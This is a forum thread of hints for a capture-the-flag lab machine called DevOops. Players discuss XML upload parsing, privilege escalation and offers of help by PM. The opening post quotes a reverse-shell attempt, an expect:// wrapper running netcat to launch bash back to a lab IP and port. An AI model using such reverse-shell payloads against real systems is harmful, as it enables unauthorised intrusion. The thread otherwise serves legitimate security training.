Dev0ops hints

expect://nc -c '/bin/bash 10.10.. 4444

Why does nothing work?

@waspy You can’t do remote code execution on this box. From my understanding the server needs some sort of php module for that.

If anyone needs a hint I’m here, just completed the box.

Took me a few long brain crunching hours but I finally got root.
I was overthinking so hard that I didn’t see the obvious solution.
Amazing box.
Learnt a lot from it.
Would Recommend!!!

Hi
Just need a pointer to get the initial foothold on this box, I think I have done enough enumeration and I’m trying to upload something and getting “Internal Server Error”. Am I on the right track??
Any advice would be greatly received!

@moony8272 said:
Hi
Just need a pointer to get the initial foothold on this box, I think I have done enough enumeration and I’m trying to upload something and getting “Internal Server Error”. Am I on the right track??
Any advice would be greatly received!

Look up the format that is being parsed and read the text on the website. You can PM me if you need another nudge.

Not too hard of a box. Was able to figure out with basic enumeration and then looking through the hints on here. Fun box though!

Need help in priv esc. Can anyone PM?

Anyone who needs help is welcome to PM me.

Already got an interesting file but definitely don’t know what to do next. Am I right that I need to send something to the ne***st for user.txt?

@iammainul said:
Need help in priv esc. Can anyone PM?

Shoot me a message, if you still need help.

I’ve gotten quite a few PMs about this box. I’ve also seen a lot of hints that kind of reiterate the same thing over and over so maybe this will help all those who are stuck.

While the path to root isn’t as complicated as it feels if you’ve been digging around for a while, it’s also not quite as obvious, I don’t think, as everyone states if you’re new to what you need to work with on this box.

Yes, RTFM is quite a thing and I agree. But to hopefully cut down on the cycle of “I’ve read the hints and done the things and can’t see what I’m missing or if I’m on the right track” I’d like to re-contextualize the hint that’s been repetitiously stated into something that may be of more conceptual aid, without adding any new hints or information.

Think about the things you are looking through/need to look through as a blueprint of a building, and the lines you are looking through in those locations as paths in the building or rooms. You need to find the correct path and room you need to be in. Go through things line by line and if you don’t understand what the line is doing, research until you do. This will help you better be able to read the blueprint and to know which path and rooms are important, which are not, and where to find the tools you need to get into the rooms you need to be in.

Happy Hunting

@Didakt said:
Rooted!
Very cool box, thanks to the creator :)

And the first hint someone gave for priv esc was just perfect:

“Far far ago, there was a man that could view back into the past, and see alternated versions of realities, how did he do that mate?”

Think about it!

Thanks for the box

Cheers. This gave me the nudge I needed :)

Rooted! DM me for hints!

Finally got root, if someone needs help, just PM me…

After figuring out what I was doing wrong with uploading the XML, I wanted to punch my own face. Basically had the XML formatting correct the whole time but it was the SYNTAX to pay very close attention to combined with the few hints the “developer” left. Hope this doesn’t give away too much, first comment on the forum, 5th “user” I’ve gotten. I think I know where to go with root now. Time to find out. Thanks for the hints to everyone as well. They were exactly what I needed to know I was on the right track, without giving away too much and taking away from the learning experience.

Hopelessly stuck on DevOops. I know the method is similar to Aragog but I can’t find the proper syntax to inject or where to inject it. Please help.

Okay, I’ve found a very interesting page, having a little trouble formatting the peanut butter for my sandwich, PM me if you can help pls

@Monkey23 the OWASP Top 10 gives you it on a plate

If I put it into the form on the page in file form it comes up in Burp all red… do I have to move it outside the number string?